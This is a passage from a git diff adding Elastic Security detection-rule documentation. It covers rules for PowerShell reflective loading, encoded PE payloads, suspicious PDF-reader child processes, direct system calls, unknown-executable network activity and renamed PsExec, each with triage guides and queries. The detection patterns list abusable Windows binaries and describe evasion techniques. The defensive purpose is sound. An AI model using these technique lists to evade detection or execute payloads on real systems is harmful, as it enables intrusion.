guide. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the script using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe +- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d +- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + "[System.Reflection.Assembly]::Load" or + "[Reflection.Assembly]::Load" + ) and not + powershell.file.script_block_text : ( + ("CommonWorkflowParameters" or "RelatedLinksHelpInfo") and + "HelpDisplayStrings" + ) and not + (powershell.file.script_block_text : + ("Get-SolutionFiles" or "Get-VisualStudio" or "Select-MSBuildPath") and + not file.name : "PathFunctions.ps1" + ) + and not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Reflective Code Loading +** ID: T1620 +** Reference URL: https://attack.mitre.org/techniques/T1620/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Dynamic-link Library Injection +** ID: T1055.001 +** Reference URL: https://attack.mitre.org/techniques/T1055/001/ +* Sub-technique: +** Name: Portable Executable Injection +** ID: T1055.002 +** Reference URL: https://attack.mitre.org/techniques/T1055/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc new file mode 100644 index 0000000000..dc212d079c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc @@ -0,0 +1,80 @@ +[[prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable]] +=== Suspicious Network Activity to the Internet by Previously Unknown Executable + +This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* filebeat-* +* packetbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-59m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:network and event.action:(connection_attempted or ipv4_connection_attempt_event) and +process.executable:( + (/etc/crontab or /etc/rc.local or ./* or /boot/* or /dev/shm/* or /etc/cron.*/* or /etc/init.d/* or /etc/rc*.d/* or + /etc/update-motd.d/* or /home/*/.* or /run/* or /srv/* or /tmp/* or /usr/lib/update-notifier/* or /var/tmp/* + ) and not (/tmp/newroot/* or /tmp/snap.rootfs*) + ) and +source.ip:(10.0.0.0/8 or 127.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and +not process.name:( + apt or chrome or curl or dnf or dockerd or dpkg or firefox-bin or java or kite-update or kited or node or rpm or + saml2aws or wget or yum or ansible* or aws* or php* or pip* or python* or steam* or terraform* +) and +not destination.ip:( + 10.0.0.0/8 or 100.64.0.0/10 or 127.0.0.0/8 or 169.254.0.0/16 or 172.16.0.0/12 or 192.0.0.0/24 or 192.0.0.0/29 or + 192.0.0.10/32 or 192.0.0.170/32 or 192.0.0.171/32 or 192.0.0.8/32 or 192.0.0.9/32 or 192.0.2.0/24 or + 192.168.0.0/16 or 192.175.48.0/24 or 192.31.196.0/24 or 192.52.193.0/24 or 192.88.99.0/24 or 198.18.0.0/15 or + 198.51.100.0/24 or 203.0.113.0/24 or 224.0.0.0/4 or 240.0.0.0/4 or "::1" or "FE80::/10" or "FF00::/8" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc new file mode 100644 index 0000000000..d191777b03 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc @@ -0,0 +1,143 @@ +[[prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process]] +=== Suspicious PDF Reader Child Process + +Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Initial Access +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious PDF Reader Child Process + +PDF is a common file type used in corporate environments and most machines have software to handle these files. This creates a vector where attackers can exploit the engines and technology behind this class of software for initial access or privilege escalation. + +This rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve PDF documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client. +- Determine if the collected files are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. + - If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("AcroRd32.exe", + "Acrobat.exe", + "FoxitPhantomPDF.exe", + "FoxitReader.exe") and + process.name : ("arp.exe", "dsquery.exe", "dsget.exe", "gpresult.exe", "hostname.exe", "ipconfig.exe", "nbtstat.exe", + "net.exe", "net1.exe", "netsh.exe", "netstat.exe", "nltest.exe", "ping.exe", "qprocess.exe", + "quser.exe", "qwinsta.exe", "reg.exe", "sc.exe", "systeminfo.exe", "tasklist.exe", "tracert.exe", + "whoami.exe", "bginfo.exe", "cdb.exe", "cmstp.exe", "csi.exe", "dnx.exe", "fsi.exe", "ieexec.exe", + "iexpress.exe", "installutil.exe", "Microsoft.Workflow.Compiler.exe", "msbuild.exe", "mshta.exe", + "msxsl.exe", "odbcconf.exe", "rcsi.exe", "regsvr32.exe", "xwizard.exe", "atbroker.exe", + "forfiles.exe", "schtasks.exe", "regasm.exe", "regsvcs.exe", "cmd.exe", "cscript.exe", + "powershell.exe", "pwsh.exe", "wmic.exe", "wscript.exe", "bitsadmin.exe", "certutil.exe", "ftp.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc new file mode 100644 index 0000000000..73d6962b84 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc @@ -0,0 +1,143 @@ +[[prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script]] +=== Suspicious Portable Executable Encoded in Powershell Script + +Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Portable Executable Encoded in Powershell Script + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the script using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad +- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Reimage the host operating system or restore the compromised files to clean versions. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + TVqQAAMAAAAEAAAA + ) and not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc new file mode 100644 index 0000000000..8397ff1d00 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc @@ -0,0 +1,152 @@ +[[prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call]] +=== Suspicious Process Access via Direct System Call + +Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/SBousseaden/status/1278013896440324096 +* https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Sysmon Only + +*Version*: 209 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Process Access via Direct System Call + +Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. + +More context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/). + +This rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove the malicious certificate from the root certificate store. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.code == "10" and + length(winlog.event_data.CallTrace) > 0 and + + /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */ + not winlog.event_data.CallTrace : + ("?:\\WINDOWS\\SYSTEM32\\ntdll.dll*", + "?:\\WINDOWS\\SysWOW64\\ntdll.dll*", + "?:\\Windows\\System32\\wow64cpu.dll*", + "?:\\WINDOWS\\System32\\wow64win.dll*", + "?:\\Windows\\System32\\win32u.dll*") and + + not winlog.event_data.TargetImage : + ("?:\\Program Files (x86)\\Malwarebytes Anti-Exploit\\mbae-svc.exe", + "?:\\Program Files\\Cisco\\AMP\\*\\sfc.exe", + "?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\*\\msedgewebview2.exe", + "?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\*\\AcroCEF.exe") and + + not (process.executable : ("?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe", + "?:\\Program Files (x86)\\World of Warcraft\\_classic_\\WowClassic.exe") and + not winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc new file mode 100644 index 0000000000..1d59d63053 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc @@ -0,0 +1,119 @@ +[[prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable]] +=== Suspicious Process Execution via Renamed PsExec Executable + +Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Process Execution via Renamed PsExec Executable + +PsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. It operates by executing a service component `Psexecsvc` on a remote system, which then runs a specified process and returns the results to the local system. Microsoft develops PsExec as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections. + +This rule identifies instances where the PsExec service component is executed using a custom name. This behavior can indicate an attempt to bypass security controls or detections that look for the default PsExec service component name. + +#### Possible investigation steps + +- Check if the usage of this tool complies with the organization's administration policy. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Identify the target computer and its role in the IT environment. +- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + +### False positive analysis + +- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. + - Prioritize cases involving critical servers and users. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] 